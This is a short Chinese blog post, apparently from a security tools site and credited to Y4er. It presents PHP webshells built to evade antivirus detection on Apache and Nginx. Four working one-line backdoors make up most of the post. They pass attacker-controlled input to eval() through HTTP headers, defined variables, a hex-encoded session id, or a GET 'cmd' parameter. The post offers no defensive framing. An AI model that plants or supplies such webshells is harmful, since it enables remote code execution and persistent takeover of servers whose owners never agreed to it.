1. 首页
  2. 工具分享

PHP利用Apache、Nginx的特性实现免杀Webshell

get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell前几天看到的,一直忘记写,填坑。 <!–more–>

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

<?php
eval(next(getallheaders())); 
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell 另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

706870696e666f28293b这个是phpinfo();的hex编码。

shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code